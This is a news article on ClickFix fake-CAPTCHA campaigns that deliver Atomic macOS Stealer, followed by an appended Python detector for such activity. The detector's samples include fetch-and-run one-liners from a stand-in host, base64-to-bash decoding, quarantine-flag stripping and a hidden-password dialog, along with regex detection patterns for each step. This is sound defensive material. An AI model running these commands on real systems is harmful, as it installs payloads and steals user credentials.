NEWS There are no viruses on macOS? Sure. Until you yourself copy them into your clipboard—at the hackers’ command.

ExcalibuR

The most dangerous thing is not the code itself, but the autopilot mode we slip into after hundreds of “I Agree” windows.


At first glance—it’s just a security check. But in reality, it’s a cleverly disguised trap leading straight into the hands of cybercriminals. Researchers from CloudSEK have documented a new wave of attacks targeting macOS users, using social engineering through fake CAPTCHA pages and malicious scripts. The infection method follows a scheme known as ClickFix—a technique that’s rapidly gaining popularity among spyware distributors.


This latest campaign revolves around the malicious program Atomic macOS Stealer (AMOS), which analysts have known about for a while. This time, it’s being spread through websites posing as pages of the American telecom operator Spectrum. Domain names like panel-spectrum[.]net and spectrum-ticket[.]net closely mimic legitimate addresses, increasing the plausibility of the fakes.


When visiting such a page, the victim is asked to complete a connection check using hCaptcha—allegedly to verify that traffic is not being intercepted. The user clicks the familiar “I’m not a robot” checkbox and then sees an error. The site claims the check failed and offers an “alternative verification” button that, when clicked, automatically copies a command to the clipboard.


What happens next depends on the operating system, but the goal is always the same: to convince the user to manually execute a malicious script. On macOS, the user is instructed to open the Terminal and paste a command that asks for the system password. Under this pretext, a chain of downloads is triggered: first a shell script, then a second-stage payload—AMOS.


AMOS is an information stealer designed to steal passwords, autofills, cryptocurrency wallet data, and other confidential information. The script actively uses macOS’s standard tools to bypass built-in protections, gain access to system data, and run binaries without warnings.


Analysis showed that the source code contains comments in Russian, indicating possible involvement of Russian-speaking hackers. This indirectly confirms the origin of the attack infrastructure and the methodology used.


Researchers also noted multiple errors in the logic of the malicious pages. For example, Linux users were shown a PowerShell command, which makes no sense for that platform. Additionally, both Windows and macOS users were told to press Win+R, which is meaningless on Apple computers. These inconsistencies suggest a rushed infrastructure setup—hackers likely wanted to launch the campaign before it was detected.


But even with such flaws, the ClickFix technique continues to work: it relies on users’ everyday habit of quickly clicking through checks and warnings. A fake CAPTCHA or cookie banner doesn’t raise alarms, especially if it looks pixel-perfect.


The ClickFix technique has already proven effective. In the past year alone, dozens of variations have been recorded. For example, in one incident in April 2025, attackers used this approach to deliver stealthy malicious files that, once in the system, facilitated lateral network movement, collected configuration data, and exfiltrated information via HTTP requests.


Delivery platforms vary, from email campaigns to compromised websites. In a campaign detected by Cofense, a fake Booking.com site targeted the hospitality industry. The phishing emails contained links to CAPTCHA pages that hid scripts launching trojans like XWorm, DanaBot, and data wipers like PureLogs.


Sometimes, the malicious script is delivered not through a CAPTCHA but through fake cookie consent banners. Again, clicking the “Accept” button triggers a download, which the user then runs, thinking it’s a harmless setup step.


In other cases, well-known verification services like Google reCAPTCHA and Cloudflare Turnstile are faked. Attackers inject malicious code into these forms or embed them into already-compromised websites. Among the popular infection vectors were programs like Lumma Stealer, StealC, and full-fledged RAT tools like NetSupport.


CloudSEK and other companies found that ClickFix attacks are active in Europe, the U.S., the Middle East, and Africa. The geography is expanding, and the attack scenarios are becoming more diverse. But the goal remains the same.


The main vulnerability exploited by these campaigns is not in the software itself, but in human behavior. Users get used to endless verifications, checks, and consent windows—and at some point, they stop reading what exactly they’re approving.


The challenge in defending against this kind of scheme is that everything looks too familiar and believable. Antivirus software can’t always detect commands you run yourself. Firewalls won’t help either if the script uses built-in tools on macOS or Windows.
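The practical defensive angle on the chain described above (a command copied to the clipboard, pasted into Terminal, a password prompt, then a fetch of a shell script and a second stage) is that the command itself is the evidence: process telemetry for children of Terminal.app records exactly what the user pasted. The following script is an added example for this thread, not code from the article or from CloudSEK. It scores command lines against the behaviours the article names (a remote script piped straight into a shell, a download to a temporary path, a password pretext, use of built-in macOS tools to run binaries without warnings). The sample command lines, the hostname example.invalid, the weights and the threshold are all constructed for the example; the osascript dialog and quarantine-attribute patterns are assumptions about how those steps are usually implemented, not indicators taken from the article.

```python
"""Heuristic triage of shell command lines for ClickFix-style activity.

Added example; not the article's or CloudSEK's code. Input is plain command
lines as an EDR or shell audit log would record them for processes spawned
from Terminal.app. Every sample below is constructed.
"""
import re

# (indicator name, weight, pattern). Weights and the threshold are tuning
# values chosen for this example, not published detection logic.
INDICATORS = [
    # A remote script fetched and executed in one line (the article's stage one).
    ("remote_fetch_piped_to_shell", 4,
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Encoded payload decoded directly into an interpreter.
    ("base64_decoded_into_shell", 4,
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;]*\|\s*(ba|z)?sh\b")),
    # Assumption: the "asks for the system password" step is often an
    # AppleScript dialog with a hidden answer field.
    ("osascript_password_dialog", 3,
     re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.I)),
    ("sudo_reads_password_from_stdin", 2,
     re.compile(r"\bsudo\s+-S\b")),
    # Assumption: "run binaries without warnings" usually means stripping the
    # quarantine attribute so Gatekeeper does not prompt.
    ("quarantine_attribute_removed", 3,
     re.compile(r"\bxattr\s+(-d\s+com\.apple\.quarantine|-cr?)\b")),
    # Second stage written to /tmp and then executed in the same line.
    ("tmp_download_then_execute", 2,
     re.compile(r"/tmp/[^\s;|&]+.*(&&|;)\s*(chmod\s+\+x\b|(nohup\s+)?/tmp/|sh\s+/tmp/)")),
    ("backgrounded_or_detached", 1,
     re.compile(r"\bnohup\b|\bdisown\b|&\s*$")),
]
THRESHOLD = 4


def score_command(cmd):
    """Return (score, [matched indicator names]) for one command line."""
    hits = [(name, w) for name, w, rx in INDICATORS if rx.search(cmd)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def is_clickfix_like(cmd):
    """True when the combined indicator weight reaches the threshold."""
    return score_command(cmd)[0] >= THRESHOLD


def triage(lines):
    """Return every line with at least one hit, highest score first."""
    rows = []
    for line in lines:
        score, hits = score_command(line)
        if hits:
            rows.append({"score": score, "flagged": score >= THRESHOLD,
                         "hits": hits, "command": line})
    rows.sort(key=lambda r: r["score"], reverse=True)
    return rows


# Constructed samples: fetch-and-execute one-liners of the kind a fake CAPTCHA
# asks the user to paste, next to ordinary administration that must not fire.
SAMPLE_COMMANDS = [
    "curl -fsSL http://example.invalid/stage1.sh | sh",
    'echo "QUJD" | base64 -D | bash',
    # second stage dropped to /tmp, quarantine flag stripped, run detached
    "curl -fsSL http://example.invalid/s.sh -o /tmp/s.sh && chmod +x /tmp/s.sh "
    "&& xattr -c /tmp/s.sh && nohup /tmp/s.sh &",
    # password pretext on its own: suspicious, but below threshold by itself
    "osascript -e 'display dialog \"Verification required\" default answer \"\" with hidden answer'",
    "brew update && brew upgrade",
    "sudo xattr -d com.apple.quarantine ~/Downloads/tool.app",
    "curl -O https://example.invalid/report.pdf",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_COMMANDS):
        mark = "FLAG" if row["flagged"] else "note"
        print(f"{mark} {row['score']:>2} {','.join(row['hits'])}: {row['command']}")
```

The threshold matters: a single quarantine-attribute removal or a single password dialog is ordinary enough on a developer's machine that it only produces a note, while the combination of download, attribute stripping and detached execution in one pasted line is what the article's chain looks like from the endpoint. In a real deployment the same scoring would be applied only to processes whose parent is Terminal.app or another shell host, which is exactly the population an antivirus treats as user-initiated and leaves alone.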